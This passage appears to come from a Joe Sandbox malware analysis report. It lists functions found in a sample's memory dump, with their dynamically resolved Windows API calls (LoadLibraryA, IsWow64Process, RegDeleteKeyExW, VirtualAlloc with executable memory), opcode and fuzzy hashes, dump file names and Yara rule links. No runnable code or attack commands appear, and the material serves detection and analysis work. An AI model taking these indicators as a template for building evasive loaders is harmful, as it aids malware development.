                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID: RoUninitialize$combase.dll
                                                                                                                                                          • API String ID: 1029625771-2819208100
                                                                                                                                                          • Opcode ID: e3de4b39e328af0093f58f39e09477ce1f2dd9bafaa2d59f1fa19389ca2ab114
                                                                                                                                                          • Instruction ID: 63d310366a3c4d035dc03b7369993af8efc665a66ff462a36ebbf42929d4656f
                                                                                                                                                          • Opcode Fuzzy Hash: e3de4b39e328af0093f58f39e09477ce1f2dd9bafaa2d59f1fa19389ca2ab114
                                                                                                                                                          • Instruction Fuzzy Hash: 68E0ECB4686740ABDB229FA1FD4DB493A65FB09702F110159F10ADACB0CBF4C5C0CB18
                                                                                                                                                          Function 0019BA51 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LocalTime__swprintf
                                                                                                                                                          • String ID: %.3d$WIN_XPe
                                                                                                                                                          • API String ID: 2070861257-2409531811
                                                                                                                                                          • Opcode ID: 9324042b33b0e8d8c05d078f57b8a62f84b51d69d0ea78fe6c81a64b9c9e7617
                                                                                                                                                          • Instruction ID: 76aac97558379d7838e71526f4120253b140adcfea77407e4b4f03226a9be54c
                                                                                                                                                          • Opcode Fuzzy Hash: 9324042b33b0e8d8c05d078f57b8a62f84b51d69d0ea78fe6c81a64b9c9e7617
                                                                                                                                                          • Instruction Fuzzy Hash: DAE06271C0C12CEBCF58DA90AE86ABA73BCBB08300F5588D3F91693454D7359B94AB12
                                                                                                                                                          Function 001820F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,001820EC,?,0017F751), ref: 00182104
                                                                                                                                                          • 6CA06DE0.KERNEL32(00000000,GetProcessId,?,001820EC,?,0017F751), ref: 00182116
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID: GetProcessId$kernel32.dll
                                                                                                                                                          • API String ID: 1029625771-399901964
                                                                                                                                                          • Opcode ID: 6f5b89f99bae416c0e30abd00c8c4b30a3974fb2cfacee78db77b1a8c31d13d5
                                                                                                                                                          • Instruction ID: 1187515d8fdcea62a7bef822dc920a7bbc020b775d58e3834bb9414b4a07aa25
                                                                                                                                                          • Opcode Fuzzy Hash: 6f5b89f99bae416c0e30abd00c8c4b30a3974fb2cfacee78db77b1a8c31d13d5
                                                                                                                                                          • Instruction Fuzzy Hash: EBD0A934610B128FD7217FA0F80D6023BE8AB04300B20542AE69AD2A98DBB0C8C0CF60
                                                                                                                                                          Function 0013E6A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,0013E69C,?,0013E43F), ref: 0013E6B4
                                                                                                                                                          • 6CA06DE0.KERNEL32(00000000,GetNativeSystemInfo,?,0013E69C,?,0013E43F), ref: 0013E6C6
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                          • API String ID: 1029625771-192647395
                                                                                                                                                          • Opcode ID: cf691fc004a4741297d6bc3315e88e13c6bda237b7d7f5fcd082d08019794512
                                                                                                                                                          • Instruction ID: da31c628eaf19180d552fe216f991bdb123956a05be4355beffe1bf3b631f800
                                                                                                                                                          • Opcode Fuzzy Hash: cf691fc004a4741297d6bc3315e88e13c6bda237b7d7f5fcd082d08019794512
                                                                                                                                                          • Instruction Fuzzy Hash: A9D0A7749007128FDB205F70F80960237D8AB34301F00541AE456E2AA4D770C4C08650
                                                                                                                                                          Function 0013E6E3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,0013E6D9,0000000C,0013E55B,001BDC28,?,?), ref: 0013E6F1
                                                                                                                                                          • 6CA06DE0.KERNEL32(00000000,IsWow64Process,?,?), ref: 0013E703
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                          • API String ID: 1029625771-3024904723
                                                                                                                                                          • Opcode ID: a23cda95f0a02ae5f49b5101abc0b6e17da0642fb663e37e23ed4f54665f2a7b
                                                                                                                                                          • Instruction ID: c0e0f0f267227c41e96b5d9bb72fca6b9b95518018f934509da7b18985506c1b
                                                                                                                                                          • Opcode Fuzzy Hash: a23cda95f0a02ae5f49b5101abc0b6e17da0642fb663e37e23ed4f54665f2a7b
                                                                                                                                                          • Instruction Fuzzy Hash: C8D0C978600B129FD7206F65F84C6477FE8BB15715F10542BE4A6D2A91DBB4C8C08AA0
                                                                                                                                                          Function 0017EBB9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,0017EBAF,?,0017EAAC), ref: 0017EBC7
                                                                                                                                                          • 6CA06DE0.KERNEL32(00000000,GetSystemWow64DirectoryW,?,0017EBAF,?,0017EAAC), ref: 0017EBD9
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                                                          • API String ID: 1029625771-1816364905
                                                                                                                                                          • Opcode ID: f817c6bfc7cbd0f6e5587c4cc16555a90e60fea201791b609c07ea8da3d7cd06
                                                                                                                                                          • Instruction ID: 9574d992cd1a214de965eb4c0ac83a53af563b72942e4e6efe3a5e266fe1bfbf
                                                                                                                                                          • Opcode Fuzzy Hash: f817c6bfc7cbd0f6e5587c4cc16555a90e60fea201791b609c07ea8da3d7cd06
                                                                                                                                                          • Instruction Fuzzy Hash: 99D0C975604B129FD7205F75F848A467BE8AB1D715F20C46EF8ABE2A50DBB0D8C08A60
                                                                                                                                                          Function 0016137B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • LoadLibraryA.KERNEL32(oleaut32.dll,?,0016135F,?,00161440), ref: 00161389
                                                                                                                                                          • 6CA06DE0.KERNEL32(00000000,RegisterTypeLibForUser,?,00161440), ref: 0016139B
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                                                                                          • API String ID: 1029625771-1071820185
                                                                                                                                                          • Opcode ID: 16ebd679c19b43bb68073aa944c8280cd64dc838326f26e58f5a7d73434b0834
                                                                                                                                                          • Instruction ID: 8e3cb149899b31945371bf248ffdbcc82def45eb306ffba7e47ed90ae47befce
                                                                                                                                                          • Opcode Fuzzy Hash: 16ebd679c19b43bb68073aa944c8280cd64dc838326f26e58f5a7d73434b0834
                                                                                                                                                          • Instruction Fuzzy Hash: EED05235D00B12AED7200B64EC0868236E8AF04328B08882AE8A6D2B50DBB0C8808A50
                                                                                                                                                          Function 001613A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00161371,?,00161519), ref: 001613B4
                                                                                                                                                          • 6CA06DE0.KERNEL32(00000000,UnRegisterTypeLibForUser,?,00161519), ref: 001613C6
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                                                                                          • API String ID: 1029625771-1587604923
                                                                                                                                                          • Opcode ID: 9353f74f3867a5ed0d87e6fe8f6d5a66109403e0572fd5177058d6df8b59e8c1
                                                                                                                                                          • Instruction ID: 8036eee338180fd2bc9377ff0c8277b49d19f4b3b722363eefb1b1f03b1e2b6f
                                                                                                                                                          • Opcode Fuzzy Hash: 9353f74f3867a5ed0d87e6fe8f6d5a66109403e0572fd5177058d6df8b59e8c1
                                                                                                                                                          • Instruction Fuzzy Hash: C8D0A934900B12AFD7200F66FC08A0236E8BB40324F04482AE4A7D2F60DBB0C8C08B90
                                                                                                                                                          Function 00183ACC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,00183AC2,?,001829F5), ref: 00183ADA
                                                                                                                                                          • 6CA06DE0.KERNEL32(00000000,RegDeleteKeyExW,?,00183AC2,?,001829F5), ref: 00183AEC
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                          • API String ID: 1029625771-4033151799
                                                                                                                                                          • Opcode ID: 4ef40ae011e01b5586891821040fbb5d86ce4ff73e96fa6c793cb0d3d6ed8557
                                                                                                                                                          • Instruction ID: 7f0a0432b93572dd9de51a92fe43f9713edf4647044188a3f3395d67cf4ce330
                                                                                                                                                          • Opcode Fuzzy Hash: 4ef40ae011e01b5586891821040fbb5d86ce4ff73e96fa6c793cb0d3d6ed8557
                                                                                                                                                          • Instruction Fuzzy Hash: 87D0C975600B239FD724AF65F80D64276E8AB16B15B14442AE4E6E2A90EFF0C9C08B50
                                                                                                                                                          Function 0012AA70 Relevance: 6.3, APIs: 4, Instructions: 300COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,00176AA6), ref: 0012AB2D
                                                                                                                                                          • _wcscmp.LIBCMT ref: 0012AB49
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BuffCharUpper_wcscmp
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 820872866-0
                                                                                                                                                          • Opcode ID: 43efc5cdf54fa8e24e98d50685c8fe7ffcd430f79ecec1b031ad504549d3acb0
                                                                                                                                                          • Instruction ID: abf8f0f3a00e0863aaaf6f33e1d0d21d70698f466782bd5c5a1635caba95307f
                                                                                                                                                          • Opcode Fuzzy Hash: 43efc5cdf54fa8e24e98d50685c8fe7ffcd430f79ecec1b031ad504549d3acb0
                                                                                                                                                          • Instruction Fuzzy Hash: 51A1E370B01116DBDB14DF65F9916BDBBA1FF58300FA5416AE85683290EB3098B1C782
                                                                                                                                                          Function 00180D01 Relevance: 6.3, APIs: 4, Instructions: 300memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CharLowerBuffW.USER32(?,?), ref: 00180D85
                                                                                                                                                          • CharLowerBuffW.USER32(?,?), ref: 00180DC8
                                                                                                                                                            • Part of subcall function 00180458: CharLowerBuffW.USER32(?,?,?,?), ref: 00180478
                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00180FB2
                                                                                                                                                          • _memmove.LIBCMT ref: 00180FC2
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3659485706-0
                                                                                                                                                          • Opcode ID: d95d3d65b6d573cb4bf2a3a92e2b2f3653468626889be9daf64e0dbf56679d98
                                                                                                                                                          • Instruction ID: 58e217c142e9c3c555e252b0ce84f7bec798fee3fd260165cfb247384d0ac5f9
                                                                                                                                                          • Opcode Fuzzy Hash: d95d3d65b6d573cb4bf2a3a92e2b2f3653468626889be9daf64e0dbf56679d98
                                                                                                                                                          • Instruction Fuzzy Hash: 19B18B716043009FC745EF28C88096ABBE4EF99714F14896EF8899B352DB31EE46CF91
                                                                                                                                                          Function 0017AF26 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 0017AF56
                                                                                                                                                          • CoUninitialize.COMBASE ref: 0017AF61
                                                                                                                                                            • Part of subcall function 00161050: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 001610B8
                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 0017AF6C
                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 0017B23F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
